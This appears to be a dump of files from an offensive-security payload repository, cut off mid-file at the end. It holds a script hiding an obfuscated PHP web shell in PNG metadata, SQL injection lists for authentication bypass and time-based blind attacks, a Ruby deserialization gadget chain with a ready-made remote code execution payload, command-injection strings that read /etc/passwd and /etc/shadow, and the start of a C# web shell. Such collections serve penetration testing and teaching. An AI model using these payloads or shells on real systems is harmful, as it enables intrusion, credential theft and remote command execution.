';ls
6 | # NOTE(review): the `<?` PHP open tags inside the shellcode strings below appear to have been stripped from this listing; restore them from the original source before relying on these payloads.
7 | #shellcode = "=@`$_GET[c]`;"
8 | shellcode = ""  # NOTE(review): this empty string is what actually gets embedded below; set it (e.g. to shellcode2) or the text chunk carries no payload.
9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'';ls
10 | shellcode2 = "='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?>=${'_'.$_}['_'](${'_'.$_}['__']);?>"  # builds "GET" by XOR ('{'^'<'='G', '{'^'>'='E', '{'^'/'='T') so $_GET never appears literally, then calls $_GET['_']($_GET['__'])
11 |
12 |
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 |
15 | # Create a backdoored PNG: the payload travels in an uncompressed PNG text chunk, not in the pixel data.
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")  # minimal carrier image; Image is imported earlier in the file, outside this excerpt
18 | im.info["shell"] = shellcode  # staged as an info entry so the loop below turns it into a text chunk keyed "shell"
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')  # info keys skipped below so they are not re-emitted as text chunks
20 |
21 | # PngInfo collects the text chunks to write (it is documented in current Pillow releases)
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 |
25 | # copy metadata into new object; for a freshly created image this is normally just the "shell" key set above
26 | for k,v in im.info.items():
27 | if k in reserved: continue
28 | meta.add_text(k, v, 0)  # third argument 0 = no zlib compression, so the payload bytes appear verbatim in a tEXt chunk of the file
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 |
31 | print("Done")
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # CONTRIBUTING
2 |
3 | PayloadsAllTheThings' Team :heart: pull requests :)
4 | Feel free to improve it with your own payloads and techniques!
5 |
6 | You can also contribute with a :beers: IRL, or using the sponsor button.
7 |
8 | ## Techniques Folder
9 |
10 | Every section should contain the following files; use the `_template_vuln` folder as the starting point for a new technique folder:
11 |
12 | - README.md - vulnerability description and how to exploit it, including several payloads (format described below)
13 | - Intruder - a set of files to give to Burp Intruder
14 | - Images - pictures for the README.md
15 | - Files - some files referenced in the README.md
16 |
17 | ## README.md format
18 |
19 | Use the following example to create a new technique `README.md` file.
20 |
21 | ```markdown
22 | # Vulnerability Title
23 |
24 | > Vulnerability description
25 |
26 | ## Summary
27 |
28 | * [Tools](#tools)
29 | * [Something](#something)
30 | * [Subentry 1](#sub1)
31 | * [Subentry 2](#sub2)
32 | * [References](#references)
33 |
34 | ## Tools
35 |
36 | - [Tool 1](https://example.com)
37 | - [Tool 2](https://example.com)
38 |
39 | ## Something
40 |
41 | Quick explanation
42 |
43 | ## References
44 |
45 | - [Blog title - Author, Date](https://example.com)
46 | ```
47 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Zip Slip/README.md:
--------------------------------------------------------------------------------
1 | # Zip Slip
2 |
3 | > Zip Slip is a directory-traversal flaw in archive extraction: a specially crafted archive holds entries with traversal filenames (e.g. `../../shell.php`), and extraction code that writes each entry to its stated path without canonicalizing it against the output directory ends up writing outside that directory. It is not specific to zip — any format whose entries carry paths can be affected, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files (or drop a web shell) and either invoke them remotely or wait for the system or a user to run them, achieving remote command execution on the victim's machine.
4 |
5 | ## Summary
6 |
7 | - [Detection](#detection)
8 | - [Tools](#tools)
9 | - [Exploits](#exploits)
10 |   - [Basic Exploit](#basic-exploit)
11 | - [Additional Notes](#additional-notes)
12 |
13 | ## Detection
14 |
15 | - Any feature that accepts an uploaded archive (zip, tar, jar, war, ...) and extracts it server-side; the format matters less than whether entry paths are canonicalized before extraction
16 |
17 | ## Tools
18 |
19 | - [evilarc](https://github.com/ptoomey3/evilarc) - builds archives whose entries carry directory-traversal names
20 |
21 | ## Exploits
22 |
23 | ### Basic Exploit
24 | `-o` selects the path separator style (`unix`/`win`), `-f` names the archive to write, `-d` is the number of `../` components prepended to the entry name and `-p` the path appended after them, so the entry below resolves to `/var/www/html/shell.php` once the traversal is applied; adjust `-p` to the target's web root.
25 | ```bash
26 | python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
27 | ```
28 |
29 | ## Additional Notes
30 | - For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability. Defensively, extraction code should resolve each entry's canonical path and reject any entry that does not stay inside the intended output directory before writing it.
31 |
32 | ## References
33 |
34 | - [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
35 | - [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
36 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php:
--------------------------------------------------------------------------------
1 | // Proof-of-concept image for the "picture resize" upload bypass: emits a 110x110 PNG built from a fixed pixel table.
2 | // NOTE(review): the `<?php` open tag that must precede this code is missing from this listing (the closing `?>` on the last line survives); restore it before use. The pixel values below are presumably tuned (per the filename) so that a PHP payload survives a server-side resize to 110x110 — verify against the target's resize library before relying on it.
3 | header('Content-Type: image/png'); // answer as an image so the output can be saved or served directly
4 |
5 | $p = array(0xA3, 0x9F, 0x67, 0xF7, 0x0E, 0x93, 0x1B, 0x23, 0xBE, 0x2C, 0x8A, 0xD0, 0x80, 0xF9, 0xE1, 0xAE, 0x22, 0xF6, 0xD9, 0x43, 0x5D, 0xFB, 0xAE, 0xCC, 0x5A, 0x01, 0xDC, 0xAA, 0x52, 0xD0, 0xB6, 0xEE, 0xBB, 0x3A, 0xCF, 0x93, 0xCE, 0xD2, 0x88, 0xFC, 0x69, 0xD0, 0x2B, 0xB9, 0xB0, 0xFB, 0xBB, 0x79, 0xFC, 0xED, 0x22, 0x38, 0x49, 0xD3, 0x51, 0xB7, 0x3F, 0x02, 0xC2, 0x20, 0xD8, 0xD9, 0x3C, 0x67, 0xF4, 0x50, 0x67, 0xF4, 0x50, 0xA3, 0x9F, 0x67, 0xA5, 0xBE, 0x5F, 0x76, 0x74, 0x5A, 0x4C, 0xA1, 0x3F, 0x7A, 0xBF, 0x30, 0x6B, 0x88, 0x2D, 0x60, 0x65, 0x7D, 0x52, 0x9D, 0xAD, 0x88, 0xA1, 0x66, 0x94, 0xA1, 0x27, 0x56, 0xEC, 0xFE, 0xAF, 0x57, 0x57, 0xEB, 0x2E, 0x20, 0xA3, 0xAE, 0x58, 0x80, 0xA7, 0x0C, 0x10, 0x55, 0xCF, 0x09, 0x5C, 0x10, 0x40, 0x8A, 0xB9, 0x39, 0xB3, 0xC8, 0xCD, 0x64, 0x45, 0x3C, 0x49, 0x3E, 0xAD, 0x3F, 0x33, 0x56, 0x1F, 0x19 ); // 138 raw byte values = 46 RGB triples; do not edit, the exact values are what the PoC depends on
6 |
7 | $img = imagecreatetruecolor(110, 110); // blank 110x110 canvas; only the top two rows (columns 0..91) are painted below
8 |
9 | for ($y = 0; $y < sizeof($p); $y += 3) { // $y is a byte index, not a row: one iteration per RGB triple (assumes count($p) is a multiple of 3 — it is, 138)
10 | $r = $p[$y];
11 | $g = $p[$y+1];
12 | $b = $p[$y+2];
13 | $color = imagecolorallocate($img, $r, $g, $b);
14 | imagesetpixel($img, round($y / 3)*2, 0, $color); // triple k = $y/3 is painted as a 2x2 block covering columns 2k..2k+1 and rows 0..1
15 | imagesetpixel($img, round($y / 3)*2+1, 0, $color);
16 | imagesetpixel($img, round($y / 3)*2, 1, $color);
17 | imagesetpixel($img, round($y / 3)*2+1, 1, $color); // round() is exact here because $y is always a multiple of 3
18 | }
19 |
20 | imagepng($img); // write the PNG to the response body
21 |
22 | ?>
--------------------------------------------------------------------------------
/SQL Injection/Intruder/FUZZDB_MSSQL-WHERE_Time.txt:
--------------------------------------------------------------------------------
1 | waitfor delay '0:0:20' /*
2 | waitfor delay '0:0:20' --
3 | ' waitfor delay '0:0:20' /*
4 | ' waitfor delay '0:0:20' --
5 | " waitfor delay '0:0:20' /*
6 | " waitfor delay '0:0:20' --
7 | ) waitfor delay '0:0:20' /*
8 | ) waitfor delay '0:0:20' --
9 | )) waitfor delay '0:0:20' /*
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /*
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /*
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /*
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /*
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /*
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /*
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /*
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /*
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /*
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /*
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /*
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /*
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /*
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /*
40 | ")))))) waitfor delay '0:0:20' --
--------------------------------------------------------------------------------
/SQL Injection/Intruder/SQL-Injection:
--------------------------------------------------------------------------------
1 | '
2 | ''
3 | `
4 | ``
5 | ,
6 | "
7 | ""
8 | /
9 | //
10 | \
11 | \\
12 | ;
13 | ' or "
14 | -- or #
15 | ' OR '1
16 | ' OR 1 -- -
17 | " OR "" = "
18 | " OR 1 = 1 -- -
19 | ' OR '' = '
20 | '='
21 | 'LIKE'
22 | '=0--+
23 | OR 1=1
24 | ' OR 'x'='x
25 | ' AND id IS NULL; --
26 | '''''''''''''UNION SELECT '2
27 | %00
28 | /*…*/
29 | + addition, concatenate (or space in url)
30 | || (double pipe) concatenate
31 | % wildcard attribute indicator
32 | @variable local variable
33 | @@variable global variable
34 | # Numeric
35 | AND 1
36 | AND 0
37 | AND true
38 | AND false
39 | 1-false
40 | 1-true
41 | 1*56
42 | -2
43 | 1' ORDER BY 1--+
44 | 1' ORDER BY 2--+
45 | 1' ORDER BY 3--+
46 | 1' ORDER BY 1,2--+
47 | 1' ORDER BY 1,2,3--+
48 | 1' GROUP BY 1,2,--+
49 | 1' GROUP BY 1,2,3--+
50 | ' GROUP BY columnnames having 1=1 --
51 | -1' UNION SELECT 1,2,3--+
52 | ' UNION SELECT sum(columnname ) from tablename --
53 | -1 UNION SELECT 1 INTO @,@
54 | -1 UNION SELECT 1 INTO @,@,@
55 | 1 AND (SELECT * FROM Users) = 1
56 | ' AND MID(VERSION(),1,1) = '5';
57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
58 | Finding the table name
59 | Time-Based:
60 | ,(select * from (select(sleep(10)))a)
61 | %2c(select%20*%20from%20(select(sleep(10)))a)
62 | ';WAITFOR DELAY '0:0:30'--
63 | Comments:
64 | # Hash comment
65 | /* C-style comment
66 | -- - SQL comment
67 | ;%00 Nullbyte
68 | ` Backtick
69 |
--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE:
--------------------------------------------------------------------------------
1 | waitfor delay '0:0:20' /*
2 | waitfor delay '0:0:20' --
3 | ' waitfor delay '0:0:20' /*
4 | ' waitfor delay '0:0:20' --
5 | " waitfor delay '0:0:20' /*
6 | " waitfor delay '0:0:20' --
7 | ) waitfor delay '0:0:20' /*
8 | ) waitfor delay '0:0:20' --
9 | )) waitfor delay '0:0:20' /*
10 | )) waitfor delay '0:0:20' --
11 | ))) waitfor delay '0:0:20' /*
12 | ))) waitfor delay '0:0:20' --
13 | )))) waitfor delay '0:0:20' /*
14 | )))) waitfor delay '0:0:20' --
15 | ))))) waitfor delay '0:0:20' --
16 | )))))) waitfor delay '0:0:20' --
17 | ') waitfor delay '0:0:20' /*
18 | ') waitfor delay '0:0:20' --
19 | ") waitfor delay '0:0:20' /*
20 | ") waitfor delay '0:0:20' --
21 | ')) waitfor delay '0:0:20' /*
22 | ')) waitfor delay '0:0:20' --
23 | ")) waitfor delay '0:0:20' /*
24 | ")) waitfor delay '0:0:20' --
25 | '))) waitfor delay '0:0:20' /*
26 | '))) waitfor delay '0:0:20' --
27 | "))) waitfor delay '0:0:20' /*
28 | "))) waitfor delay '0:0:20' --
29 | ')))) waitfor delay '0:0:20' /*
30 | ')))) waitfor delay '0:0:20' --
31 | ")))) waitfor delay '0:0:20' /*
32 | ")))) waitfor delay '0:0:20' --
33 | '))))) waitfor delay '0:0:20' /*
34 | '))))) waitfor delay '0:0:20' --
35 | "))))) waitfor delay '0:0:20' /*
36 | "))))) waitfor delay '0:0:20' --
37 | ')))))) waitfor delay '0:0:20' /*
38 | ')))))) waitfor delay '0:0:20' --
39 | ")))))) waitfor delay '0:0:20' /*
40 | ")))))) waitfor delay '0:0:20' --
41 |
--------------------------------------------------------------------------------
/SQL Injection/Intruder/Auth_Bypass.txt:
--------------------------------------------------------------------------------
1 | '-'
2 | ' '
3 | '&'
4 | '^'
5 | '*'
6 | ' or ''-'
7 | ' or '' '
8 | ' or ''&'
9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 |
--------------------------------------------------------------------------------
/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php:
--------------------------------------------------------------------------------
1 |
33 |
--------------------------------------------------------------------------------
/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | # Builds the Ruby 2.x "universal" Marshal deserialization gadget chain one link at a time, exercising each link locally before assembling the final payload, then validates the serialized payload in a fresh interpreter and prints it as hex and Base64.
3 | class Gem::StubSpecification
4 | def initialize; end # reopen with a no-arg constructor so the gadget object can be instantiated and its ivars set by hand
5 | end
6 | # WARNING: the sink is Kernel#open on a "|command" string, so every STEP below (and the validation) is expected to execute `id` on THIS machine; run it in a disposable environment and change the command only if you accept what it does.
7 | # Only classes bundled with rubygems are used, so no extra gems are required; the chain is described in the elttam write-up on Ruby 2.x deserialization.
8 | stub_specification = Gem::StubSpecification.new
9 | stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") # a leading "|" makes open() spawn the command; 1>&2 sends its output to stderr
10 |
11 | puts "STEP n" # innermost link: the stub's #name reads its data from @loaded_from (presumably via open), which fires the command
12 | stub_specification.name rescue nil
13 | puts
14 |
15 |
16 | class Gem::Source::SpecificFile
17 | def initialize; end # same trick: make the class instantiable without a real gem file
18 | end
19 |
20 | specific_file = Gem::Source::SpecificFile.new
21 | specific_file.instance_variable_set(:@spec, stub_specification) # @spec is what #<=> consults, reaching the stub above
22 |
23 | other_specific_file = Gem::Source::SpecificFile.new # second element, needed so a comparison actually happens
24 |
25 | puts "STEP n-1" # comparing two SpecificFile objects calls into @spec, i.e. triggers STEP n
26 | specific_file <=> other_specific_file rescue nil
27 | puts
28 |
29 |
30 | $dependency_list= Gem::DependencyList.new
31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) # global so marshal_dump below can reach it
32 |
33 | puts "STEP n-2" # DependencyList#each sorts @specs, which invokes <=> on them, i.e. triggers STEP n-1
34 | $dependency_list.each{} rescue nil
35 | puts
36 |
37 |
38 | class Gem::Requirement
39 | def marshal_dump # override so Marshal.dump writes the dependency list as this object's payload; on load, Gem::Requirement#marshal_load receives it (the outermost link)
40 | [$dependency_list]
41 | end
42 | end
43 |
44 | payload = Marshal.dump(Gem::Requirement.new)
45 |
46 | puts "STEP n-3" # full chain in this process: load the bytes just produced
47 | Marshal.load(payload) rescue nil
48 | puts
49 |
50 |
51 | puts "VALIDATION (in fresh ruby process):" # shows the payload works without the monkey-patches above being present
52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
53 | pipe.print payload
54 | pipe.close_write
55 | puts pipe.gets # NOTE: the command's output goes to the child's stderr (1>&2), which is inherited and so appears on the console directly; this only reads what the child wrote to stdout (likely nothing)
56 | puts
57 | end
58 |
59 | puts "Payload (hex):"
60 | puts payload.unpack('H*')[0]
61 | puts
62 |
63 |
64 | require "base64"
65 | puts "Payload (Base64 encoded):"
66 | puts Base64.encode64(payload)
--------------------------------------------------------------------------------
/Insecure Deserialization/Ruby.md:
--------------------------------------------------------------------------------
1 | # Ruby Deserialization
2 |
3 | ## Marshal.load
4 |
5 | `Files/Ruby_universal_gadget_generate_verify.rb` generates the gadget chain and verifies it locally. The loop below replays the resulting Marshal payload against Ruby 2.0 through 2.5; the embedded command is `id 1>&2` (visible in the hex as `7c696420313e2632`), so it runs inside each container and prints on stderr:
6 |
7 | ```bash
8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
9 | ```
10 |
11 | ## YAML.load
12 |
13 | Vulnerable code (`YAML.load` on attacker-controlled input):
14 | ```ruby
15 | require "yaml"
16 | YAML.load(File.read("p.yml"))
17 | ```
18 |
19 | Exploitation payload (contents of `p.yml`; indentation is significant):
20 | ```yaml
21 | --- !ruby/object:Gem::Requirement
22 | requirements:
23 |   !ruby/object:Gem::DependencyList
24 |   specs:
25 |   - !ruby/object:Gem::Source::SpecificFile
26 |     spec: &1 !ruby/object:Gem::StubSpecification
27 |       loaded_from: "|id 1>&2"
28 |   - !ruby/object:Gem::Source::SpecificFile
29 |     spec:
30 | ```
31 | `YAML.load` must not be used on untrusted input; use `YAML.safe_load`, which only permits an explicit whitelist of classes. With Psych 4 (bundled with Ruby 3.1+) `YAML.load` behaves like `safe_load` by default and the old behaviour is only reachable through `YAML.unsafe_load`.
32 |
33 | ## References
34 |
35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
36 | - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
--------------------------------------------------------------------------------
/SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY:
--------------------------------------------------------------------------------
1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
19 |
--------------------------------------------------------------------------------
/Command Injection/Intruder/command-execution-unix.txt:
--------------------------------------------------------------------------------
1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
3 | <!--#exec%20cmd="/usr/bin/id;-->
4 | <!--#exec%20cmd="/usr/bin/id;-->
5 | /index.html|id|
6 | ";id;"
7 | ';id;'
8 | ;id;
9 | ;id
10 | ;netstat -a;
11 | "|id|"
12 | '|id|'
13 | |id
14 | |/usr/bin/id
15 | |id|
16 | "|/usr/bin/id|"
17 | '|/usr/bin/id|'
18 | |/usr/bin/id|
19 | "||/usr/bin/id|"
20 | '||/usr/bin/id|'
21 | ||/usr/bin/id|
22 | |id;
23 | ||/usr/bin/id;
24 | ;id|
25 | ;|/usr/bin/id|
26 | "\n/bin/ls -al\n"
27 | '\n/bin/ls -al\n'
28 | \n/bin/ls -al\n
29 | \n/usr/bin/id\n
30 | \nid\n
31 | \n/usr/bin/id;
32 | \nid;
33 | \n/usr/bin/id|
34 | \nid|
35 | ;/usr/bin/id\n
36 | ;id\n
37 | |usr/bin/id\n
38 | |nid\n
39 | `id`
40 | `/usr/bin/id`
41 | a);id
42 | a;id
43 | a);id;
44 | a;id;
45 | a);id|
46 | a;id|
47 | a)|id
48 | a|id
49 | a)|id;
50 | a|id
51 | |/bin/ls -al
52 | a);/usr/bin/id
53 | a;/usr/bin/id
54 | a);/usr/bin/id;
55 | a;/usr/bin/id;
56 | a);/usr/bin/id|
57 | a;/usr/bin/id|
58 | a)|/usr/bin/id
59 | a|/usr/bin/id
60 | a)|/usr/bin/id;
61 | a|/usr/bin/id
62 | ;system('cat%20/etc/passwd')
63 | ;system('id')
64 | ;system('/usr/bin/id')
65 | %0Acat%20/etc/passwd
66 | %0A/usr/bin/id
67 | %0Aid
68 | %22%0A/usr/bin/id%0A%22
69 | %27%0A/usr/bin/id%0A%27
70 | %0A/usr/bin/id%0A
71 | %0Aid%0A
72 | "& ping -i 30 127.0.0.1 &"
73 | '& ping -i 30 127.0.0.1 &'
74 | & ping -i 30 127.0.0.1 &
75 | & ping -n 30 127.0.0.1 &
76 | %0a ping -i 30 127.0.0.1 %0a
77 | `ping 127.0.0.1`
78 | | id
79 | & id
80 | ; id
81 | %0a id %0a
82 | `id`
83 | $;/usr/bin/id
84 |
--------------------------------------------------------------------------------
/Dependency Confusion/README.md:
--------------------------------------------------------------------------------
1 | # Dependency Confusion
2 |
3 | > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
4 |
5 | ## Summary
6 |
7 | * [Tools](#tools)
8 | * [Exploit](#exploit)
9 | * [References](#references)
10 |
11 | ## Exploit
12 |
13 | Look for `npm`, `pip` and `gem` packages; the methodology is the same for each ecosystem: register a public package with the same name as a private one used by the company, then wait for an installer to pull it. The substitution happens when the package manager is configured to consult a public registry as well as the internal one and resolves the public copy (typically the one carrying the higher version number) in preference to the internal package. Mitigations include claiming the internal names on the public registry and installing only through a single private feed that proxies upstream, rather than resolving across several indexes.
14 |
15 | ### NPM example
16 |
17 | * List all the packages the target depends on (e.g. from `package.json`, `composer.json`, ...)
18 | * Find the ones that do not exist on https://www.npmjs.com/ (an internal name that is unclaimed publicly)
19 | * Register and publish a **public** package with the same name (keep any proof-of-concept payload harmless, e.g. a benign callback)
20 | * Package example : https://github.com/0xsapra/dependency-confusion-expoit
21 |
22 | ## References
23 |
24 | * [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
25 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
26 | * [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
27 | * [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained]( https://www.youtube.com/watch?v=zFHJwehpBrU )
28 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension ASP/shell.ashx:
--------------------------------------------------------------------------------
1 | <% @ webhandler language="C#" class="AverageHandler" %>
2 |
3 | using System;
4 | using System.Web;
5 | using System.Diagnostics;
6 | using System.IO;
7 |
8 | public class AverageHandler : IHttpHandler
9 | {
10 | /* .Net requires this to be implemented */
11 | public bool IsReusable // IHttpHandler contract: true lets ASP.NET reuse a single handler instance across requests (this listing shows no instance fields, so that is safe here)
12 | {
13 | get { return true; }
14 | }
15 |
16 | /* main executing code */
17 | public void ProcessRequest(HttpContext ctx)
18 | {
19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
21 |
22 | ctx.Response.Write("